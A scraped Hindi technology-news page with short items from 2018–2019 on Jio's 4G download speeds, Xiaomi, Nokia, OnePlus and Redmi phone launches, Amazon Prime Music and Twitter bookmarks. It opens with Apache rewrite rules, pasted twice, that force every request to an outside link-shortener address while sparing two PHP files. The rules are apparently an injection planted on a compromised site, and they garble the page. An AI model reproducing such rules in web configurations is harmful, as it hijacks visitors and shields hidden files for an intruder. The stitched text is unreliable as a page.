
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
मुकेश अंबानी की रिलायंस जियो ने 4 जी डाउनलोड गति के मामले में एक बार फिर दूरसंचार क्षेत्र की अन्य सभी कंपनियों को बहुत पीछे छोडक़र जनवरी 19 में अव्वल स्थान हासिल किया। भारतीय दूरसंचार नियामक प्राधिकरण (ट्राई) के नवीनतम आंकड़ों के अनुसार जनवरी 19 में रिलायंस जियो की औसत 4 जी डाउनलोड गति 18.8 मेगावाट प्रति सेकेंड (एमबीपीएस) रही। इसकी तुलना में भारती एयरटेल की दिसंबर के 9.8 एमबीपीएस की तुलना में गिरकर 9.5 एमबीपीएस रही। जियो नेटवर्क की दिसंबर में 4 जी डाउनलोड गति 18.7 एमबीपीएस थी। वर्ष 2018 के दौरान जियो 4 जी डाउनलोड गति के मामले में अन्य कंपनियों के मुकाबले कहीं आगे था। ट्राई आंकड़ों के अनुसार वोडाफोन की 4 जी डाउनलोड गति में मामूली सुधार हुआ और यह जनवरी में 6.7 एमबीपीएस रही। यह दिसंबर में 6.3 एमबीपीएस। आइडिया की स्पीड छह एमबीपीएस से गोता लगाकर 5.5 एमबीपीएस रह गयी। हालांकि आइडिया और वोडाफोन के दूरसंचार कारोबार का विलय हो गया है और अब यह वोडाफोन आइडिया के तहत काम कर रही है.किन्तु नियामक ने जनवरी के लिए दोनों के आंकड़े अलग.अलग दर्शाये हैं। अपलोड गति के मामले में आइडिया अव्वल रहा। कंपनी की औसत अपलोड गति दिसंबर महीने के 5.3 एमबीपीएस से बढकर जनवरी में 5.8 एमबीपीएस हो गयी। वोडाफोन इस मामले में 5.4 एमबीपीएस के साथ दूसरे और जियो 4.4 एमबीपीएस के साथ तीसरे नंबर पर रहा। एयरटेल 3.8 एमबीपीएस के साथ सबसे नीचे रहा। रिलायंस जियो की 4 जी डाउनलोड गति और आइडिया की अपलोड गति के मामले में पिछले कई महीनों से लगातार बादशाहत बरकरार है। औसत गति की गणना ट्राई के एकत्र किये गये आंकड़ों के आधार पर की जाती है, जिसे रियल टाइम बेसिस पर ट्राई के माईस्पीड एप्लीकेशन की मदद से जुटाया जाता है
17 Feb, 2019
आगे पढ़ऐइंटरनेट डेस्क। चीन की मोबाइल निर्माता कंपनी शाओमी अपना एक नया स्मार्टफोन लांच करने वाली है। शाओमी 20 फरवरी को अपना Mi 9 को लांच करेगी। तो वहीं कंपनी के सीईओ ली जून स्मार्टफोन Mi 9 के कई रेंडर्स को शेयर कर चुके है। तो वहीं हाल ही में वीबो पर कंपनी के आधिकारिक अकाउंट से नए ग्रेडिएंट फिनिश के साथ Mi 9 की तस्वीरें शेयर की है। कंपनी ने शयेर की तस्वीर में भी इस स्मार्टफोन की फ्रंट पैनल की झलक देखने को नहीं मिल रही है। आपको बता दें कि कंपनी के सीईओ ली जून ने इस बात को कंफर्म किया है कि Xiaomi Mi 9 में क्वालकॉम स्नैपड्रैगन 855 प्रोसेसर होगा। तो वहीं इससे पहले Lenovo ने पिछले साल दिसंबर में स्नैपड्रैगन 855 प्रोसेसर से लैस Z5 Pro GT को लांच कर चुकी है। शाओमी के आधिकारिक वीबो अकाउंट से मी9 की कुछ फोटों को भी शेयर किया है। इनमें यह स्मार्टफोन पिंक—ब्लू ग्रेडिएंट फिनिश के साथ नजर आ रहा है। गौरतलब है कि शाओमी के प्रवक्ता डोनोवन सुंग ने हाल ही में एक ट्विटर पर एक टीजर शेयर किया है। यह टीजर इस बात की ओर इशारा कर रहा है कि मी9 मोबाइल सिक्योरिटी के लिए इन डिस्प्ले फिंगरप्रिंट सेंसर का उपयोग कर सकता है। हालांकि इसके अलावा और कोई जानकारी शेयर नहीं की है। वहीं यदि एक रिपोर्ट की माने तो Xiaomi Mi 9 में एंड्रॉयड पाई, 3500 एमएएच बैटरी, 6.4 इंच का एमोलेड स्क्रीन के साथ वाटरड्रॉप नॉच होगा। इस स्मार्टफोन में ट्रिपल रियर कैमरा सेटअप के साथ सेल्फी के साथ 24 मेगापिक्सल का फ्रंट कैमरा दिया जा सकता है।
17 Feb, 2019
आगे पढ़ऐनई दिल्ली। ई-कॉमर्स कंपनी अमेज़न ने अपनी नई सर्विस ‘Prime Music’ लॉन्च कर दी है। प्राइम म्यूजिक सर्विस पिछले साल एक्सक्लूसिव तौर पर Eco डिवाइस के लिए पेश किया गया था लेकिन अब यह सर्विस एंड्रॉयड और iOS डिवाइस के लिए भी उपलब्ध कराई जा रही है। इतना ही नहीं कंपनी ने प्राइम म्यूजिक का डेस्कटॉप वर्जन भी उतारा है। अमेज़न प्राइम विडियो की सर्विस अमेज़न प्राइम मेंबर्स को उनकी सालाना मेंबरशिप के साथ फ्री मिलेगी। इसके साथ ही, अमेज़न प्राइम मेंबर्स को ऐड फ्री म्यूजिक की सुविधा भी दी जाएगी। अमेज़न ने साल 2016 में भारत में अपनी प्राइम सर्विस शुरू की थी। कैसा है Amazon Play Music -इस सर्विस में यूजर्स हिंदी के अलावा इंग्लिश, पंजाबी, तेलुगू, तमिल, कन्नड़, मराठी, मलयालम, बांग्ला, गुजराती और राजस्थानी भाषा में गाने सुन सकेंगे। -इस म्यूजिक सर्विस में ऑफलाइन म्यूजिक डाउनलोड करने का ऑप्शन भी मिलेगा। -इसमें Alexa वॉइस सपोर्ट मिलेगा जिसमें आप गाने सर्च कर अपनी आवाज के साथ गाने सुन सकेंगे। कंपनी का दावा है कि अमेज़न प्राइम म्यूजिक इंडियन और इंटरनेशनल आर्टिस्ट्स के लाखों गाने मौजूद है।
07 Apr, 2018
आगे पढ़ऐट्विटर की खास बात है की इस प्लेटफार्म पर बड़ी संख्या में आपको जानकारी मिलती है। अगर किसी यूजर ने करीब एक हजार से ज्यादा लोगों को फॉलो कर रखा है। ऐसे में उसके पास हर मिनट करीब 50 ज्यादा ट्वीट पहुंचते हैं। इसमें सबसे बड़ी दिक्कत है तब होती है, जब हमें को पुराना ट्वीट ढूँढना होता है। अब तक अगर कोई ट्वीट हमे जरुरी लगता था तो, हम उसका लिंक कॉपी कर उसे सेव कर रख लेते थे। लेकिन अब शायद ऐसा करने की जरुरत नहीं पड़ेगी। ट्विटर अपने प्लेटफार्म पर हाल ही में ऐसा फीचर जोड़ा है, जिसकी मदद से हम आसानी से कोई भी ट्वीट सेव कर सकेंगे और उनकी की अलग से एक लिस्ट बना सकेंगे। इस नए फीचर को बुकमार्क ट्वीट का नाम दिया गया है। Bookmark ट्वीट बुकमार्क ट्वीट आप्शन की मदद से हम आसानी से किसी भी ट्वीट को भविष्य के लिए सेव कर सकेंगे। इससे पहले ऐप में किसी ट्वीट को लाइक, रिट्वीट,रिप्लाई और डीएम का आप्शन नजर आता था। ट्वीटर के लेटेस्ट अपडेट में यूजर्स को अब डायरेक्ट मैसेज करने के साथ ट्वीट को बुकमार्क में एड करने का आप्शन नजर आएगा। Share ट्वीट इसके साथ ट्वीटर पर ट्वीट को अन्य प्लेटफार्म में शेयर कने का नया आप्शन जोड़ा गया है। ट्विटर का यह नया अपडेट काफी सुविधाजनक है। इससे यूजर्स को ट्वीट सेव शेयर करने में काफी आसानी होगी।
07 Apr, 2018
आगे पढ़ऐहम में से ज्यादातर लोग स्मार्टफोन खरीद तो लेते हैं, लेकिन उसके फीचर्स और स्पेसिफिकेशन के बारे में ज्यादा जानकारी नहीं होती है। होली के रंग में भंग अक्सर उस वक्त पड़ जाता है। जब आपका हजारों का स्मार्टफोन रंग खेलते वक्त उसमें थोड़ा भी पानी चला जाए। ऐसे में होली से पहले आप बाजार में मौजूद अलग-अलग तरह के प्रोटेक्टिव पाउच और कवर का इस्तेमाल कर अपने कीमती स्मार्टफोन को पानी से बचा सकते हैं। लेकिन क्या आपको पता है, जिस स्मार्टफोन को आप पानी से बचा रहे है, हो सकता है वह पहले से वाटरप्रूफ हो। लेकिन कैसे पता चलेगा कि आपका स्मार्टफोन वाटरप्रूफ है या नही. आइये हम आपको बताते हैं... IP रेटिंग बताती है स्मार्टफोन वाटरप्रूफ कैपबिलिटी पानी के अन्दर कोई स्मार्टफोन कितना पॉवरफुल है। इसका अंदाज़ा उसको मिलने वाली IP रेटिंग से लगाया जा सकता है। IP 67 और IP68 वाले सभी स्मार्टफोन वाटरप्रूफ होते है। जिनपर पानी का किसी भी तरह से कोई प्रभाव नहीं पड़ता है। क्या होता है IP67 अगर आपका मोबाइल IP67 रेटिंग से लैस तो वह स्मार्टफोन पानी के अन्दर एक मीटर गहराई तक 30 मिनट तक आराम से रह सकता है। क्या होता है IP68 इसी तरह से अगर आपका स्मार्टफोन IP68 रेटिंग से लैस है तो वह स्मार्टफोन पानी के अन्दर करीब 1.5 गहराई तक 30 मिनट तक आराम से रह सकता है। तो अगली बार जब आप स्मार्टफोन खरीदने जाए तो इन रेटिंगस पर जरूर गौर करें क्योंकि इनके साथ आपका स्मार्टफोन पानी में भीगने के बाद भी आराम से काम करेगा।
07 Apr, 2018
आगे पढ़ऐनई दिल्ली। फ्लिपकार्ट पर रेडमी नोट 5 और नोट 5 प्रो की 4 अप्रैल को सेल रखी गई थी। सेल 12 बजे से शुरू की गई थी और कुछ ही मिनटों में ये वेबसाइट पर ये Out Of Stock शो हो रहा है। शियोमी ने इन दोनों स्मार्टफोन 14 फरवरी को लॉन्च किया था और 22 फरवरी को ये फोन सेल के पहली बार उपलब्ध कराया गया है। फिलहाल इस बात की कोई जानकारी नहीं है कि इसे दुबारा बिक्री के लिए कब उपलब्ध कराया जाएगा। फीचर्स के मामले में Redmi Note 5 बेहद शानदार है। और खास बात तो ये है कि एडवांस फीचर्स होने के बावजूद इसकी कीमत बेहद कम है। नोट 5 की 3GB रैम और 32GB स्टोरेज की कीमत 9,999 रुपये है। वहीं, 4GB रैम और 64GB स्टोरेज वाले Redmi Note5 की कीमत 11,999 रुपये है। कंपनी का कहना है कि Redmi Note5 लो-लाइट फोटोग्राफी पिछले Note स्मार्टफोन्स के मुकाबले कहीं बेहतर है। Redmi Note 5 में 1.25 माइक्रो मीटर पिक्सल साइज है। इसमें 12 मेगापिक्सल का रियर और 5 मेगापिक्सल का फ्रंट कैमरा मिलेगा। Redmi Note 5 में है 5.99 इंच का फुल HD+ डिस्प्ले दिया गया है। इसकी थिकनेस 8.05mm है. इस स्मार्टफोन में 4,000 mAh की बैटरी दी गई है।
05 Apr, 2018
आगे पढ़ऐनई दिल्ली। तो आपके सामने जल्द आ रहा है शियोमी का Xiao AI, जो कि आपकी हर बात को मानेगा। इसके अलावा कहा जा रहा है कि इसके सामने एप्पल की सीरी,गूगल असिस्टेंड और सैमसंग के बिक्सबी भी नहीं टिकने वाले। शियोमी ने आर्टिफिशियल इंटेलिजेंस बेस्ड वर्चुअल वॉयस ऐसिस्टेंट सर्विस Xiao AI लॉन्च कर दिया है। कंपनी के मुताबिक कंपनी के लेटेस्ट स्मार्टफोन Mi Mix 2S में वॉयस असिस्टेंट Xiao AI दिया जाएगा। Xiaomi ने एक वीडियो जारी किया है, जिसमें इस पर्सनल असिस्टेंट के बारे में बताया गया है। AI बेस्ड ये असिस्टेंट आपके कमांड्स पर काम करेगा। असिस्टेंट से मौसम का हाल, लोकेशन और आसपास खाने के लिए क्या है जैसे सवाल पूछ सकते हैं। कहा जा रहा है कि शियोमी के स्मार्ट होम डिवाइस के लिए इस असिस्टेंट में इसका सपोर्ट दिया गया है। इससे पहले शियोमी दो नए बजट ईयरफोन्स, Mi Earphones Basic और Mi Earphones को भारत में लॉन्च किया है। Mi ईयरफोन बेसिक की कीमत 399 रुपये रखी गई है। Mi ईयरफोन्स की कीमत 699 रुपये रखी गई है।
05 Apr, 2018
आगे पढ़ऐनई दिल्ली। वनप्लस के फ्लैगशिप स्मार्टफोन OnePlus 6 का इंतज़ार जल्द खत्म होने वाला है। वनप्लस अपने इस नए फोन को मई के पहले हफ्ते में लॉन्च कर सकती है। इस फोन को लेकर लंबे समय से अफवाहों का बाज़ार गरम था, अब कंपनी ने इस बात पर मुहर लगा दी है कि वह फोन को पेश करने के लिए तैयार है। कंपनी ने ट्वीटर पर 4 सेकेंड का एक वीडियो जारी किया गया है। इस वीडियो के साथ कैप्शन लिखा है 6th Ready। साथ ही वीडियो में Speed का जिक्र भी है। इससे पहले इस बात की पुष्टि हो चुकी है कि आने वाला फोन लेटेस्ट क्वालकॉम प्रोसेसर, स्नैपड्रैगन 845 से लैस होगा। इससे पहले अफवाहें आ रही थी कि फोन को 6 मार्च को लॉन्च किया जाएगा। रिपोर्ट्स के मुताबिक फोन में 8 जीबी की रैम और 256 जीबी की इंटरनल स्टोरेज हो सकती है। इससे पहले कंपनी के CEO Pete Lau ने कंफर्म किया था कि वनप्लस 6 पर आईफोन X नॉच जैसा डिस्प्ले दिया जाएगा। साथ ही हाल ही में टिप्सटर Evan Blass की लीक की गई फोटो में कंफर्म किया गया है कि फोन के पीछे ठीक फिंगरप्रिंट सेंसर के उपर वर्टकिल डुअल कैमरा सेटअप होगा। रिपोर्ट के मुताबिक, वनप्लस 6 के 64 जीबी वेरिएंट की कीमत 3,299 चीनी युआन (करीब 34,200 रुपये) होगी, जबकि 128 जीबी वेरिएंट को 3,799 चीनी युआन (करीब 39,300 रुपये) में लॉन्च किया जाएगा। वहीं 256 जीबी स्टोरेज वाले टॉप-ऐंड मॉडल को 4,399 चीनी युआन (करीब 45,600 रुपये) में लॉन्च किए जाने की उम्मीद है। इसके अलावा टिप्सटर Ronald Quant ने फोन को Wifi सर्टिफिकेशन वेबसाइट पर स्पॉट किया। लिस्टिंग से पता चलता है कि फोन, Android 8.1 Oreo out-of-the-box, डुअल-बैंड वाई-फाई 802.11ac और लेटेस्ट क्वालकॉम WCN3990 Wifi modem के साथ आएगा।
05 Apr, 2018
आगे पढ़ऐनई दिल्ली। नोकिया के मोबाइल बनाने वाली कंपनी HMD ग्लोबल अपने नए फोन के साथ इंडिया मार्केट में एंट्री कर रही है। इन नए मोबाइल्स के साथ नोकिया भारतीय बाजार में अपनी पैठ मजबूत करने की तैयारी में है। लॉन्चिंग इवेंट को कंपनी के फेसबुक पेज के जरिए सीधा देखा जा सकेगा। खबरें हैं कि कंपनी आज होने वाली इवेंट में नोकिया 6 (2018), नोकिया 7 प्लस और नोकिया 8 Sirocco भारत में लॉन्च कर सकती है। फरवरी में बर्सिलोना में हुई मोबाइल वर्ल्ड कांग्रेस 2018 में नोकिया 8110 4G और नोकिया 1 एंड्रॉयड Go के साथ इन तीनों स्मार्टफोन को पेश किया गया था। नोकिया 1 एंड्रॉयड Go को पहले ही भारत में लॉन्च कर दिया गया है। भारत में इस फोन की कीमत 5,499 रुपये है। भारतीय बाजार में नोकिया 6 (2018), नोकिया 7 प्लस और नोकिया 8 Sirocco शियोमी, ओप्पो और विवो जैसी चाइनीज कंपनियों को कड़ी टक्कर देंगे। इन तीनों फोन में नोकिया 8 Sirocco फ्लैगशिप स्मार्टफोन होगा। इस फोन में स्टेनलैस स्टील बॉडी और ग्लास बैक होगा. इन सभी फोन को एंड्रॉयड वन के साथ उतारा जाएगा। इसका मतलब है कि ये फोन एंड्रॉयड के स्टॉक वर्जन पर चलेंगे। नोकिया 6: नया नोकिया 6 अपने ओरिजनल मॉडल से काफी बेहतर हो सकता है। नए नोकिया 6 में एल्युमीनियम केस होगा और इसमें 5.5 इंच का डिस्प्ले होगा। यह फोन स्नैपड्रैगन 630 प्रोसेसर से पावर्ड है। फोन में 3GB या 4GB रैम और 32GB या 64GB स्टोरेज हो सकता है। इस फोन की कीमत 16,000 रुपये के करीब हो सकती है। नोकिया 7 प्लस: OnePlus 5T को कड़ी टक्कर देने के लिए नोकिया यह फोन उतारने जा रही है। इस मोबाइल में 6 इंच का डिस्प्ले होगा। इस फोन के बैक में ड्यूल कैमरा होंगे। नोकिया 7 प्लस एक प्रीमियम मिड इंड स्मार्टफोन होगा। नोकिया 7 प्लस की कीमत 24,000 रुपये के करीब हो सकती है। नोकिया 8 Sirocco: कंपनी iphone X और गैलेक्सी S9 के मुकाबले यह फोन लाने जा रही है। इस हाई इंड स्मार्टफोन में स्टेनलैस स्टील बॉडी है। इस फोन के बैक और फ्रंट में 3D ग्लास हैं। इस फोन में स्नैपड्रैगन 835 प्रोसेसर मिलेगा। इस फोन में 3,260mAh की बैटरी है। इस फोन की कीमत 52,000 रुपये के करीब हो सकती है।
05 Apr, 2018
आगे पढ़ऐनई दिल्ली। फिनलैंड की कंपनी एचएमडी ग्लोबल नोकिया अप्रैल की शुरुआत में अपने 3 नए एंड्रॉयड स्मार्टफोन्स लॉन्च करने जा रही है। इस कपंनी ने हाल ही में अपने नोकिया 6 (2018), नोकिया 7 प्लस और नोकिया 8 सिरोक्को ग्लोबल लॉन्च किया था, लेकिन अब तीनों ही स्मार्टफोन्स को 04 अप्रैल को भारत में लॉन्च किया जा रहा है। नोकिया 7 प्लस नोकिया 7 प्लस में 6 इंच की फुल एचडी प्लस डिस्प्ले दी गई है जिसका ऐस्पेक्ट रेश्यो 18:9 है। इस स्मार्टफोन में ऑक्टा कोर क्वॉल्कॉम स्नैपड्रैगन 660 प्रोसेसर और 4जीबी रैम है। यह फोन एंडायड 8.0 ओरियो पर काम करता है। इसकी सबसे खास बात इसमें दिया गया कैमरा भी है जिसमें डुअल रियर कैमरा है। इसमें एक लेंस 12 मेगापिक्सल का वाइड एंगल है जिसका अपर्चर एफ/1.75 जबकि दूसरा 13 मेगापिक्सल का है जिसका अपर्चर एफ/2.6 है। इसमें 16 मेगापिक्सल का फ्रंट कैमरा सेल्फी के लिए दिया गया है। इस कैमरे का अपर्चर एफ/2.0 है। नोकिया 8 सिरोक्को इसमें 3डी कॉर्निंग गोरिल्ला ग्लास 5 के साथ 5.5- इंच क्यूएचडी (1440 गुणा 2560 पिक्सल) प्रो एलइडी डिस्प्ले दिया गया है तथा यह आउट ऑफ द बॉक्स एंड्रॉयड 8.0 ओरियो पर काम करता है। इसमें 6जीबी रैम के साथ ऑक्टा-कोर क्वॉलकॉम स्नैपड्रैगन 835 प्रोसेसर दिया गया है। इसमें पीछे की तरफ 12 मेगापिक्सल और 13 मेगापिक्सल के दो कैमरे दिए गए हैं। इसके अलावा इसमें 13 मेगापिक्सल का टेलीफोटो लेंस दिया गया है जिसमें 2 गुना ऑप्टिकल जूम है। इसके डुअल रियर कैमरे के साथ डुअल टोन एलईडी फ्लैश भी दिया गया है। नोकिया 8 सिरोक्को के फ्रंट में फिक्स्ड फोकस लेंस और एफ/2.0 अपर्चर वाला 5 मेगापिक्सल का कैमरा दिया गया है। इस फोन की मेमोरी 128 जीबी की है।
03 Apr, 2018
आगे पढ़ऐ